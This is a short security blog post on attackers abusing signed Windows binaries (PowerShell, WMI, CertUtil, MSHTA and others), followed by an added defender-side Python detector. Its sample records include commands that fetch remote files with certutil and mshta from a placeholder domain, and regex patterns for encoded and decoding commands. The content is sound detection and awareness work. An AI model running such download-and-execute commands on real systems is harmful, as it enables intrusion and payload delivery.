The breach doesn’t always come with malware.
Sometimes the threat is already inside – your own tools, turned against you.
Attackers know the terrain. They don’t bring weapons. They sharpen yours.
LOLBins – Native, Trusted, Dangerous
- PowerShell – The Swiss Army knife of abuse. Recon, lateral movement, payload download, persistence – all from a signed shell.
- WMI – Silent execution across machines. Perfect for stealthy command delivery without touching disk.
- CertUtil – Meant for certificate management. Abused for file downloads and base64 decoding in plain sight.
- MSHTA – Executes HTML applications, including remotely hosted ones. Often slips past default alerting rules.
- rundll32, regsvr32, schtasks, bitsadmin – System-native. Hard to block. Easy to script.
No exploits. No noise. Just your system, obeying new masters.
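A defender-side example, added here and not part of the original post: a small Python detector that scans constructed process-creation records (the Sysmon-style field names, the suspicious-parent set and the sample events are assumptions) for the abuse patterns the list above describes: a LOLBin reaching for a remote URL, certutil decoding a file, or a LOLBin spawned by an Office parent.

```python
import re

# Signed, system-native binaries named in the list above (lowercase image names).
LOLBINS = {
    "powershell.exe", "wmic.exe", "certutil.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "schtasks.exe", "bitsadmin.exe",
}
# Assumption: Office / mail clients should not normally spawn these binaries.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
# Argument patterns tied to the abuses described: remote fetch, decoding, encoded shell.
ARG_PATTERNS = {
    "remote_url": re.compile(r"https?://", re.I),
    "certutil_decode": re.compile(r"\bcertutil(\.exe)?\b.*-decode\b", re.I),
    "encoded_cmd": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def parse_event(line):
    """Parse a constructed 'key=value|key=value' process-creation record."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|"))

def score_event(line):
    """Return a finding dict if the event looks like LOLBin abuse, else None."""
    ev = parse_event(line)
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    if image not in LOLBINS:
        return None  # not a binary we care about; cheap early exit
    reasons = [name for name, rx in ARG_PATTERNS.items() if rx.search(cmd)]
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"parent:{parent}")
    return {"image": image, "parent": parent, "reasons": reasons} if reasons else None

# Constructed sample telemetry (not real logs); example.invalid is a reserved domain.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\certutil.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=certutil -urlcache -f http://example.invalid/a.txt a.txt",
    r"Image=C:\Windows\System32\certutil.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=certutil -decode a.txt a.bin",
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Program Files\Microsoft Office\winword.exe|CommandLine=mshta http://example.invalid/p.hta",
    r"Image=C:\Windows\System32\certutil.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=certutil -hashfile setup.msi SHA256",
    r"Image=C:\Windows\System32\notepad.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=notepad report.txt",
]

def run_detection(lines=SAMPLE_EVENTS):
    """Run the scorer over a batch of records and keep only the findings."""
    return [f for f in map(score_event, lines) if f]

if __name__ == "__main__":
    for finding in run_detection():
        print(finding)
```

The benign certutil -hashfile record is deliberately included: binary name alone is not a signal, the argument and parent context is what separates legitimate use from abuse.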
Defenders look for the foreign.
Attackers live off the familiar.
If you trust it, they weaponize it.
DeadSwitch | The Cyber Ghost
“In silence, we rise. In the switch, we fade.”